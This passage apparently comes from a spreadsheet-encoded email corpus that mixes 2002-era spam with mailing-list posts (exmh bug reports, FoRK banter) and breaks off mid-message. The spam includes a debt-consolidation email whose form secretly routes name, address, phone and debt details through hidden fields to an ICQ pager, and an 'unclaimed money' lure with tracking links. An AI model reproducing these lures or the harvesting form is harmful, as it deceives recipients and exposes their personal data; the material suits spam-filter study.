    <t xml:space="preserve">&lt;HTML&gt;&lt;CENTER&gt;&lt;table&gt;&lt;tr&gt;&lt;td bgcolor=99cc99&gt;&lt;table width=490 cellpadding=3 cellspacing=3 border=0&gt;&lt;tr&gt;&lt;td align=center&gt;&lt;font face=arial color=000000 size=5&gt;&lt;i&gt;
 &lt;table BORDER cellpadding =3 width =595 CELLSPACING=0 CELLPADDING=0 WIDTH="100%" BGCOLOR=#99cc99&gt;
 &lt;td align=center WIDTH="100%" BGCOLOR="#99cc99" bordercolor="#99cc99"&gt;&lt;font face=Verdana COLOR=blue size=-1&gt;&lt;B&gt;Free Debt Consolidation Information
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;BR&gt;
 Free 1 Minute Debt Consolidation Quote&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;font face=arial color=0000AA size=-2&gt;* Quickly and easily reduce Your Monthly Debt Payments Up To 60% &lt;BR&gt;&lt;BR&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align=center&gt;&lt;font face =arial size=2 color=000033&gt;We are a 501c Non-Profit Organization&lt;/b&gt; that has helped 1000's consolidate their&lt;br&gt; debts into one easy affordable monthly payment. For a Free - No Obligation&lt;/b&gt;&lt;br&gt; quote to see how much money we can save you, please read on.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;center&gt;&lt;table cellpadding=4 cellspacing=4&gt;&lt;tr&gt;&lt;td align=center&gt;&lt;FONT size=2 COLOR=blue FACE=ARIAL,HELVETICA&gt;&lt;i&gt;Become Debt Free...Get Your Life Back On Track!&lt;/font&gt;&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table cellpadding=2 cellspacing=2&gt;&lt;tr&gt;&lt;td align=center&gt;&lt;FONT size=2 COLOR=003333 FACE=ARIAL,HELVETICA&gt;All credit accepted and home 
 ownership is NOT required.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td align=center&gt;&lt;FONT size=2 COLOR=003333 FACE=ARIAL,HELVETICA&gt;
 &lt;tr&gt;&lt;td align=center&gt;&lt;FONT size=2 COLOR=003333 FACE=ARIAL,HELVETICA&gt; Not Another Loan To Dig You Deeper In To Debt!&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table cellpadding=4 cellspacing=4&gt;&lt;tr&gt;&lt;td align=center&gt;&lt;font face=arial size=2 color=blue&gt;&lt;font color=#000000 size=3&gt; &lt;/font&gt;100% Confidential - No Obligation - Free Quote &lt;font color=33000 size=3&gt; &lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td align=center&gt;&lt;font face=arial size=4&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/HTML&gt;
 &lt;title&gt;Free Debt Consolidation Quote&lt;/title&gt;
 &lt;BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" ALINK="#0000FF" VLINK="#99cc99"&gt;
 &lt;table cellpadding=3 cellspacing=3 BORDER=0 WIDTH="495"&gt;
 &lt;tr&gt;&lt;td ALIGN=CENTER BGCOLOR="#99cc99"&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;td ALIGN=CENTER BGCOLOR="#99cc99"&gt;&lt;font face=Verdana color=#000000 size=+0&gt;If you have $4000 or more in debt, a trained professional&lt;br&gt; will negotiate with your creditors to:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;CENTER&gt;
 &lt;table cellpadding=3 cellspacing=3 BORDER=0 WIDTH="450"&gt;
 &lt;td ALIGN=CENTER BGCOLOR="#99cc99"&gt;&lt;font face=Verdana color=#000000 size=-1&gt;
 Lower your monthly debt payments up to 60%&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;td ALIGN=CENTER BGCOLOR="#99cc99"&gt;&lt;font face=Verdana color=#000000 size=-1&gt;
 End creditor harassment&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;td ALIGN=CENTER BGCOLOR="#99cc99"&gt;&lt;font face=Verdana color=#000000 size=-1&gt;
 Save thousands of dollars in interest and late charges&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;td ALIGN=CENTER BGCOLOR="#99cc99"&gt;&lt;font face=Verdana color=#000000 size=-1&gt;
 Start improving your credit rating&lt;BR&gt;&lt;BR&gt;
 &lt;table BORDER cellpadding =3 width =595 CELLSPACING=0 CELLPADDING=0 WIDTH="100%" BGCOLOR=#000000&gt;
 &lt;td align=center WIDTH="100%" BGCOLOR="#99cc99" bordercolor="#99cc99"&gt;&lt;font face=Verdana COLOR=blue size=-1&gt;&lt;B&gt;Complete
 Our QuickForm and Submit it for Your Free Analysis.&lt;/font&gt;&lt;/B&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;table  CELLSPACING=4 CELLPADDING=4 border=0 WIDTH="100%"&gt;
 &lt;tr bgcolor=99cc99&gt;
 		  &lt;form name="frmLogin"&gt;
 			&lt;input type="hidden" name="nick" value="Guest"&gt;
 																												&lt;input type="hidden" name="icq" value="158884664"&gt;
 			&lt;input type="hidden" name="info" value=""&gt;
 			&lt;input type="hidden" name="but" value="Chat"&gt;
 			 &lt;/form&gt;
           &lt;/td&gt;
           &lt;td rowspan="4" valign="top" width="47%" height="230"&gt;
 		  &lt;form name="myform"&gt;
 			&lt;input type="HIDDEN" name="charcount" value="450"&gt;
 		&lt;/form&gt;
             &lt;form name="pagerform" action="http://wwp.icq.com/whitepages/page_me/1,,,00.html" method="Post"&gt;		
 																													&lt;input type="HIDDEN" name="to" value="158884664"&gt;
               &lt;table width="85%" border="0" align="center"&gt;
                 &lt;tr&gt; 
          &lt;tr&gt; 
                   &lt;td&gt; 
                   &lt;/td&gt;
                   &lt;td&gt; 
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt; 
                 &lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td colspan="2"&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;input type="HIDDEN" name="charcount" value="450"&gt;																						      
 &lt;input type="hidden" name="from" value="D06@D06.com"&gt;
 &lt;input type="hidden" name="fromemail" value="D06@D06.com"&gt;
 &lt;td align=right WIDTH="45%" HEIGHT="18" BGCOLOR="#99cc99"&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;&lt;br&gt;Name &lt;/font&gt;&lt;/td&gt;
 &lt;input type="hidden" name="body" value="{{name}}"&gt;
 &lt;td BGCOLOR="#99cc99"&gt;&lt;input type="text" size="21"  name="body" maxlength="30"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;td align=right WIDTH="45%" BGCOLOR="#99cc99"&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;Street Address &lt;/font&gt;&lt;/td&gt;
 &lt;input type="hidden" name="body" value="{{address}}"&gt;
 &lt;td BGCOLOR="#99cc99"&gt;&lt;input type="text" size="21" name="body" maxlength="30"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;td align=right WIDTH="45%" BGCOLOR="#99cc99"&gt;
 &lt;input type="hidden" name="body" value="{{city}}"&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;City &lt;/font&gt;&lt;/td&gt;
 &lt;td BGCOLOR="#99cc99"&gt;&lt;input name="body" size="21" maxlength=30&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;td align=right  WIDTH="45%" BGCOLOR="#99cc99"&gt;
 &lt;input type="hidden" name="body" value="{{state}}"&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;State / Zip &lt;/font&gt;&lt;/td&gt;
 &lt;td BGCOLOR="#99cc99"&gt;
 &lt;select name=body&gt;
 &lt;option value=""&gt;&lt;/option&gt;
 &lt;option value="AL"&gt; Alabama
 &lt;option value="AK"&gt; Alaska
 &lt;option value="AZ"&gt; Arizona
 &lt;option value="AR"&gt; Arkansas
 &lt;option value="CA"&gt; California
 &lt;option value="CO"&gt; Colorado
 &lt;option value="CT"&gt; Connecticut
 &lt;option value="DE"&gt; Delaware
 &lt;option value="DC"&gt; Dist of Columbia
 &lt;option value="FL"&gt; Florida
 &lt;option value="GA"&gt; Georgia
 &lt;option value="HI"&gt; Hawaii
 &lt;option value="ID"&gt; Idaho
 &lt;option value="IL"&gt; Illinois
 &lt;option value="IN"&gt; Indiana
 &lt;option value="IA"&gt; Iowa
 &lt;option value="KS"&gt; Kansas
 &lt;option value="KY"&gt; Kentucky
 &lt;option value="LA"&gt; Louisiana
 &lt;option value="ME"&gt; Maine
 &lt;option value="MD"&gt; Maryland
 &lt;option value="MA"&gt; Massachusetts
 &lt;option value="MI"&gt; Michigan
 &lt;option value="MN"&gt; Minnesota
 &lt;option value="MS"&gt; Mississippi
 &lt;option value="MO"&gt; Missouri
 &lt;option value="MT"&gt; Montana
 &lt;option value="NE"&gt; Nebraska
 &lt;option value="NV"&gt; Nevada
 &lt;option value="NH"&gt; New Hampshire
 &lt;option value="NJ"&gt; New Jersey
 &lt;option value="NM"&gt; New Mexico
 &lt;option value="NY"&gt; New York
 &lt;option value="NC"&gt; North Carolina
 &lt;option value="ND"&gt; North Dakota
 &lt;option value="OH"&gt; Ohio
 &lt;option value="OK"&gt; Oklahoma
 &lt;option value="OR"&gt; Oregon
 &lt;option value="PA"&gt; Pennsylvania
 &lt;option value="RI"&gt; Rhode Island
 &lt;option value="SC"&gt; South Carolina
 &lt;option value="SD"&gt; South Dakota
 &lt;option value="TN"&gt; Tennessee
 &lt;option value="TX"&gt; Texas
 &lt;option value="UT"&gt; Utah
 &lt;option value="VT"&gt; Vermont
 &lt;option value="VA"&gt; Virginia
 &lt;option value="WA"&gt; Washington
 &lt;option value="WV"&gt; West Virginia
 &lt;option value="WI"&gt; Wisconsin
 &lt;option value="WY"&gt; Wyoming &lt;/select&gt;
 &lt;input type="hidden" name="body" value="{{zip}}"&gt;
 &lt;input type=text name="body" size="5" maxlength=5&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;input type="hidden" name="body" value="{{hphone}}"&gt;
 &lt;td align=right WIDTH="45%" BGCOLOR="#99cc99"&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;Home Phone &lt;/font&gt;&lt;font size=-2&gt;(with area code) &lt;/font&gt;&lt;/td&gt;
 &lt;td BGCOLOR="#99cc99"&gt;&lt;input type="text" size="21" name="body" maxlength="19"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;td align=right WIDTH="45%" BGCOLOR="#99cc99"&gt;
 &lt;input type="hidden" name="body" value="{{wphone}}"&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;Work Phone &lt;/font&gt;&lt;font size=-2 color=000000&gt;(with area code) &lt;/font&gt;&lt;/td&gt;
 &lt;td BGCOLOR="#99cc99"&gt;&lt;input type="text" size="21" name="body" maxlength="19"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;td align=right WIDTH="45%" BGCOLOR="#99cc99"&gt;
 &lt;input type="hidden" name="body" value="{{btime}}"&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;Best
 Time To Contact &lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td BGCOLOR="#99cc99"&gt;&lt;select size="1" name="body"&gt;
 &lt;option value="Morning at Home"&gt;Morning at Home&lt;/option&gt;
 &lt;option value="Morning at Work"&gt;Morning at Work&lt;/option&gt;
 &lt;option value="Afternoon at Home"&gt;Afternoon at Home&lt;/option&gt;
 &lt;option value="Afternoon at Work"&gt;Afternoon at Work&lt;/option&gt;
 &lt;option value="Evening at Home"&gt;Evening at Home&lt;/option&gt;
 &lt;option value="Evening at Work"&gt;Evening at Work &lt;/option&gt;
 &lt;option value="Weekend"&gt;Weekend&lt;/option&gt;&lt;/select&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
 &lt;input type="hidden" name="body" value="{{email}}"&gt;
 &lt;td align=right WIDTH="45%" BGCOLOR="#99cc99"&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;Email
 address &lt;/font&gt;&lt;/td&gt;
 &lt;td BGCOLOR="#99cc99"&gt;&lt;input type="text" name="body" size="21"&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;input type="hidden" name="body" value="{{tdebt}}"&gt;
 &lt;td align=right WIDTH="45%" BGCOLOR="#99cc99"&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;Total
 Debt &lt;/font&gt;&lt;/td&gt;
 &lt;td BGCOLOR="#99cc99"&gt;
 &lt;select name=body&gt;
 &lt;option value=""&gt;&lt;/option&gt;
 &lt;option value="$4000 - $4999"&gt;$4000 - $4999
 &lt;option value="$5000 - $7500"&gt;$5000 - $7500
 &lt;option value="$7,501 - $10,000"&gt;$7,501 - $10,000
 &lt;option value="$10,001 - $12,500"&gt;$10,001 - $12,500
 &lt;option value="$12,501 - $15,000"&gt;$12,501 - $15,000
 &lt;option value="$15,001 - $17,500"&gt;$15,001 - $17,500
 &lt;option value="$17,501 - $20,000"&gt;$17,501 - $20,000
 &lt;option value="$20,001 - $22,500"&gt;$20,001 - $22,500
 &lt;option value="$22,501 - $25,000"&gt;$22,501 - $25,000
 &lt;option value="$25,001 - $27,500"&gt;$25,001 - $27,500
 &lt;option value="$27,501 - $30,000"&gt;$27,501 - $30,000
 &lt;option value="$30,001 - $35,000"&gt;$30,001 - $35,000
 &lt;option value="$35,001 - $40,000"&gt;$35,001 - $40,000
 &lt;option value="$45,001 - $50,000"&gt;$45,001 - $50,000
 &lt;option value="$50,000+"&gt;$50,000+&lt;/select&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
 &lt;p&gt;&lt;input type="submit" value="Click Here to Submit"&gt;&lt;input type="reset" value="Reset"&gt;&lt;/center&gt;&lt;/form&gt;
 &lt;table BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="100%" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="100%"&gt;
 &lt;center&gt;&lt;font face="Verdana" size=-2 color=880000&gt;Please click the submit button
 just once - process will take 30-60 seconds.&lt;/font&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td WIDTH="100%"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;BR&gt;
 &lt;table BORDER cellpadding =3 width =595 CELLSPACING=0 CELLPADDING=0 WIDTH="100%" BGCOLOR=#000000&gt;
 &lt;td align=center WIDTH="100%" BGCOLOR="#99cc99" bordercolor="#99cc99"&gt;&lt;font face=Verdana COLOR=blue size=-1&gt;&lt;B&gt;Or, please reply to the email with the following for your Free Analysis&lt;/font&gt;&lt;/B&gt;
 &lt;BR&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;BR&gt;
 &lt;CENTER&gt;
 &lt;table BORDER=0 cellpadding =3 width =295 CELLSPACING=0 CELLPADDING=0 WIDTH="100%" BGCOLOR=#000000&gt;
 &lt;font face=Verdana color=#000000 size=-1&gt;
 Name:__________________________&lt;BR&gt;
 Address:________________________&lt;BR&gt;
 City:___________________________&lt;BR&gt;
 State:_____________ Zip:_________&lt;BR&gt;
 Home Phone:(___) ___-____    &lt;BR&gt;
 Work Phone:(___) ___-____    &lt;BR&gt;
 Best Time:_______________________&lt;BR&gt;
 Email:___________________________&lt;BR&gt;
 Total Debt:______________________&lt;BR&gt;
 &lt;/table&gt;
 &lt;/html&gt;&lt;BR&gt;
 Not Interested?  Please inform us :)
 w1ypq
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Webdev] php-mailsettings anyone?
</t>
  </si>
  <si>
    <t xml:space="preserve">
  Hi all,
  I'm looking for a copy of the php-mailsettings package, or PHP Cyrus-Tools,
  which should include the former. All web references point to the canonical
  location, which is unavailable. Author hasn't responded either.
  Thanks!
 _______________________________________________
 Webdev mailing list
 Webdev@linux.ie
 http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">I wrote:
 &gt;I personally doubt it simply because I never heard of Bush and Chirac
 &gt;going to Brighton.
 Actually it doesn't say that they did, just that Blair spoke to
 Williams there.
 R
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: revocation of grlygrl201@
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Well Beberg, unless you're really into Anime and actually hold true
 that dead people can send email, I think Geege's subject is just dandy.
 Especially since she removed herself from the hive that is aol (and
 placed herself unto another, but hey :-))
 Geege:  I think its cute when he worries like that, don't you?
 :)
 *ducks and runs*
 (bonus FoRK points if Adam knows what anime i'm refering to)
 BB
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Tue, 20 Aug 2002 17:27:47 -0500
     From:        Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
     Message-ID:  &lt;1029882468.3116.TMDA@deepeddy.vircio.com&gt;
   | I'm hoping that all people with no additional sequences will notice are
   | purely cosmetic changes.
 Well, first, when exmh (the latest one with your changes) starts, I get...
 can't read "flist(totalcount,unseen)": no such element in array
     while executing
 "if {$flist(totalcount,$mhProfile(unseen-sequence)) &gt; 0} {
 	FlagInner spool iconspool labelup
     } else {
 	FlagInner down icondown labeldown
     }"
     (procedure "Flag_MsgSeen" line 3)
     invoked from within
 "Flag_MsgSeen"
     (procedure "MsgSeen" line 8)
     invoked from within
 "MsgSeen $msgid"
     (procedure "MsgShow" line 12)
     invoked from within
 "MsgShow $msgid"
     (procedure "MsgChange" line 17)
     invoked from within
 "MsgChange 4862 show"
     invoked from within
 "time [list MsgChange $msgid $show"
     (procedure "Msg_Change" line 3)
     invoked from within
 "Msg_Change $msg(id) $show"
     (procedure "Msg_Show" line 7)
     invoked from within
 "Msg_Show cur"
     ("eval" body line 1)
     invoked from within
 "eval $msgShowProc"
     (procedure "FolderChange" line 55)
     invoked from within
 "FolderChange inbox {Msg_Show cur}"
     invoked from within
 "time [list  FolderChange $folder $msgShowProc"
     (procedure "Folder_Change" line 3)
     invoked from within
 "Folder_Change $exmh(folder)"
     (procedure "Exmh" line 101)
     invoked from within
 "Exmh"
     ("after" script)
 which is probably related to my not having an "unseen" sequence anywhere
 (certainly not in inbox) - I read all of my outstanding mail before I
 tried this new exmh ...
 Second, I've been used to having a key binding which was to Msg_MarkUnseen
 which doesn't seem to exist any more, and I'm not sure what I should replace
 that with.   There's obviously a way as the "Sequences" menu does this.
 The "Mark Unseen" menu entry in the message "More" menu is still wanting
 that function as well...
   | For those who have other sequences defined, the window will widen to
   | display the other sequences.
 Any chance of having that lengthen instead?   I like all my exmh stuff
 in nice columns (fits the display better).   That is, I use the detached
 folder list, one column.   The main exmh window takes up full screen,
 top to bottom, but less than half the width, etc...
 I have space for more sequences, in the "unseen" window, as long as they
 remain once nice narrow window (best would be if the sequences could be
 ordered by some preference, then ones which didn't fit would just fall
 off the bottom, and not be shown).
 I'd also prefer it if that window had no unusual background colouring,
 just one constant colour - I have been running the unseen window with
 background black, on a root window that is all black, with no borders or
 other decorations, but made "sticky" - the appearance is just like the
 folders with unseen messages (and their counts) are written into the
 root window (because it is sticky, this small display follows me around
 and do I can see when new mail needs processing).
 I also find that I tend to have a bunch of sequences that only ever occur
 in one folder (some I had forgotten I ever created).  So in addition to
 the "sequences to always show" and "sequences to never show", a
 preference to only show sequences that occur in more than one folder
 would be useful, and then have the sequences that occor only in the
 folder I'm visiting appear in the list when that folder is current.
 This is just to keep the list size somewhat manageable while remaining
 productive (I quite often use a sequence to remember a particular message
 in a folder - the name is used only there, and only for one message,
 it gives me a handle on the message which remains as the folder is
 packed, sorted, etc).
 I haven't updated my exmh for some time now, so I'm not sure if this
 next one is new, or just new since 2.5, but the Sequences menu (on the
 bar with New Flist Search ...) only contains "unseen" and "urgent".
 It would be useful if it contained all of the sequences that the folder
 happens to have defined.   A "New sequence" entry would also be useful
 (to mark the message with a sequence name that didn't previously exist,
 which can be done now using "Search" and the pick interface, but is
 clumsy that way)
 Actually, you once could, now when I try this, entering a sequence name
 in the pick box, and a single message number, or a range N-N in the
 list of messages, and no pick attributes at all, I now get ...
 syntax error in expression "int(1+1+(1 hit-1)*(3868-1-2)/(4878-1))"
     while executing
 "expr int($minlineno+1+($msgid-$minmsgid)*($maxlineno-$minlineno-2)/($maxmsgid-$minmsgid))"
     (procedure "Ftoc_FindMsg" line 46)
     invoked from within
 "Ftoc_FindMsg $msg"
     (procedure "Ftoc_FindMsgs" line 5)
     invoked from within
 "Ftoc_FindMsgs $msgids"
     (procedure "Ftoc_PickMsgs" line 5)
     invoked from within
 "Ftoc_PickMsgs $pick(ids) $pick(addtosel)"
     (procedure "PickInner" line 13)
     invoked from within
 "PickInner {exec pick +inbox -list} {4852 -sequence mercury}"
     ("uplevel" body line 1)
     invoked from within
 "uplevel #0 $cmd"
     (procedure "busyCursorInner" line 8)
     invoked from within
 "busyCursorInner $cmd $widgets"
     (procedure "busyCursorHack" line 32)
     invoked from within
 "busyCursorHack $args"
     ("cursor" arm line 1)
     invoked from within
 "switch $busy(style) {
 	icon		{busyIcon $args}
 	cursorAll	{busyCursor $args}
 	cursor		{busyCursorHack $args}
 	default		{eval $args}
     }"
     (procedure "busy" line 3)
     invoked from within
 "busy PickInner $cmd $msgs"
     (procedure "Pick_It" line 51)
     invoked from within
 "Pick_It"
     invoked from within
 ".pick.but.pick invoke"
     ("uplevel" body line 1)
     invoked from within
 "uplevel #0 [list $w invoke]"
     (procedure "tkButtonUp" line 7)
     invoked from within
 "tkButtonUp .pick.but.pick
 "
     (command bound to event)
 It has been ages since I did this last though.   I tried adding a Subject
 to pick on (easy as I know what's in the message...) which made no difference.
 Looks as if something is now saying "1 hit" when before it didn't, or
 similar.
   | I've also changed the ftoc colorization as discussed briefly on the list a 
   | week or so ago.
 Any chance of making the current message a little brighter background?
 Just to make it stand out a fraction more than it does (maybe this is
 more apparent to me than many, as I use very small fonts everywhere,
 the background of the ftoc line isn't very wide).
 Hope this helps.
 kre
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks Tony, but I think doing it using component files will get a .signature 
 by default, but I have many diferent signatures and I want to insert one of 
 that signatures using a keyboard command. So for a message I will insert a 
 signature, but for another message I will insert a different signature.
 Is it possible? I am using sedit for my messages.
 Thanks.
 Ulises
 &gt; &gt; Hi!
 &gt; &gt; 
 &gt; &gt; Is there a command to insert the signature using a combination of keys and not
 &gt; &gt; to have sent the mail to insert it then?
 &gt; 
 &gt; I simply put it (them) into my (nmh) component files (components,
 &gt; replcomps, forwcomps and so on).  That way you get them when you are
 &gt; editing your message.  Also, by using comps files for specific
 &gt; folders you can alter your .sig per folder (and other tricks).  See
 &gt; the docs for (n)mh for all the details.
 &gt; 
 &gt; There might (must?) also be a way to get sedit to do it, but I've
 &gt; been using gvim as my exmh message editor for a long time now.  I
 &gt; load it with a command that loads some email-specific settings, eg,
 &gt; to "syntax" colour-highlight the headers and quoted parts of an
 &gt; email)... it would be possible to map some (vim) keys that would add
 &gt; a sig (or even give a selection of sigs to choose from).
 &gt; 
 &gt; And there are all sorts of ways to have randomly-chosen sigs...
 &gt; somewhere at rtfm.mit.edu... ok, here we go:
 &gt; rtfm.mit.edu/pub/usenet-by-group/news.answers/signature_finger_faq.
 &gt; (Warning... it's old, May 1995).
 &gt; 
 &gt; &gt; Regards,
 &gt; &gt; Ulises
 &gt; 
 &gt; Hope this helps.
 &gt; 
 &gt; Cheers
 &gt; Tony
 &gt; 
 &gt; 
 &gt; 
 &gt; _______________________________________________
 &gt; Exmh-users mailing list
 &gt; Exmh-users@redhat.com
 &gt; https://listman.redhat.com/mailman/listinfo/exmh-users
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 22 Aug 2002, Joseph S. Barrera III wrote:
 --]Why wait until you're dead? I'm sure there's enough carbon in
 --]the fat from your typical liposuction job to make a decent diamond.
 So thats why I keep seeing DeBeers agents hovering around me.
 -tom(diamonds in the folds of my flesh)wsmf
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Detective sends out Al Qaeda warning based on Onion story
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8408636,1717/
 Date: 2002-09-30T21:20:25+01:00
 (Poynter.org)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: zzzz, do we have your money?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;body bgcolor="#FFFFFF"&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" bgColor=#005000 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD bgColor=#005000&gt;&lt;IMG height=1 src="http://image.linkgift.net/promotions/fmimages/c-pix.gif" width=1 
       border=0&gt; 
       &lt;DIV align=center&gt;
       &lt;CENTER&gt;
       &lt;TABLE width=566 bgColor=#ffffff border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width="100%" bgColor=#ffffff&gt;
             &lt;TABLE cellSpacing=14 cellPadding=6 width=566 bgColor=#ffffff 
             border=0&gt;
               &lt;TBODY&gt;
               &lt;TR&gt;
                 &lt;TD align=middle width="100%" bgColor=#ffffff colSpan=2 
                 height=375&gt;&lt;IMG height=77 
                   src="http://image.linkgift.net/promotions/fmimages/isthisyours.gif" width=298 
                   border=0&gt;&lt;BR&gt;&lt;A href="http://track.linkgift.net/cgi-bin/a?e=3444431.13"&gt;&lt;IMG 
                   height=252 src="http://image.linkgift.net/promotions/fmimages/check.jpg" width=563 
                   border=0&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG height=10 
                   src="http://image.linkgift.net/promotions/fmimages/c-pix.gif" width=1 border=0&gt;&lt;BR&gt;&lt;IMG 
                   height=30 src="http://image.linkgift.net/promotions/fmimages/itcouldbe.gif" width=148 
                   border=0&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD vAlign=top width="50%" bgColor=#ffffff&gt;
                   &lt;P align=justify&gt;&lt;FONT color=#666666&gt;&lt;B&gt;&lt;FONT 
                   color=#006666&gt;MarketingonTarget.com&lt;/FONT&gt;&lt;/B&gt; has teamed up 
                   with &lt;/FONT&gt;&lt;A href="http://track.linkgift.net/cgi-bin/a?e=3444431.13"&gt;&lt;B&gt;&lt;FONT 
                   color=#006666&gt;FoundMoney&lt;/FONT&gt;&lt;/B&gt;&lt;/A&gt;&lt;FONT 
                   color=#666666&gt; to help you locate and claim your lost CASH.
                   The amount on that check, OR MORE, literally be YOURS for 
                   the claiming. 
                   &amp;nbsp; &lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
                 &lt;TD vAlign=top width="50%" bgColor=#ffffff&gt;
                   &lt;P align=justify&gt;&lt;FONT color=#666666&gt;This is not a contest or a promotion. &lt;/FONT&gt;&lt;A href="http://track.linkgift.net/cgi-bin/a?e=3444431.13"&gt;&lt;B&gt;&lt;FONT 
                   color=#006666&gt;FoundMoney&lt;/FONT&gt;&lt;/B&gt;&lt;/A&gt;&lt;FONT 
                   color=#666666&gt; is a search service dedicated to putting 
                   UNCLAIMED MONEY together with its rightful 
                 owners.&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD align=middle width="100%" bgColor=#ffffff colSpan=2 
                 height=47&gt;&lt;IMG height=5 src="http://image.linkgift.net/promotions/fmimages/c-pix.gif" 
                   width=1 border=0&gt;&lt;BR&gt;&lt;A href="http://track.linkgift.net/cgi-bin/a?e=3444431.13"&gt;&lt;IMG 
                   height=40 src="http://image.linkgift.net/promotions/fmimages/featured.gif" width=316 
                   border=0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD vAlign=top width="50%" bgColor=#ffffff&gt;
                   &lt;P align=justify&gt;&lt;FONT color=#666666&gt;There are &lt;B&gt;31 
                   million&lt;/B&gt; North American people eligible right now to claim unknown 
                   cash windfalls. The search is Fast, Easy and GAURANTEED&amp;nbsp;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
                 &lt;TD vAlign=top width="50%" bgColor=#ffffff&gt;
                   &lt;P align=justify&gt;&lt;FONT color=#666666&gt;Over &lt;B&gt; BILLION&lt;/B&gt; is 
                   sitting in our database alone, which contains bank and government accounts, wills and estates, insurance settlements etc.&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD align=middle width="100%" bgColor=#ffffff colSpan=2 
                 height=65&gt;&lt;IMG height=5 src="http://image.linkgift.net/promotions/fmimages/c-pix.gif" 
                   width=1 border=0&gt;&lt;BR&gt;&lt;A href="http://track.linkgift.net/cgi-bin/a?e=3444431.13"&gt;&lt;IMG 
                   height=56 src="http://image.linkgift.net/promotions/fmimages/9outof10.gif" width=458 
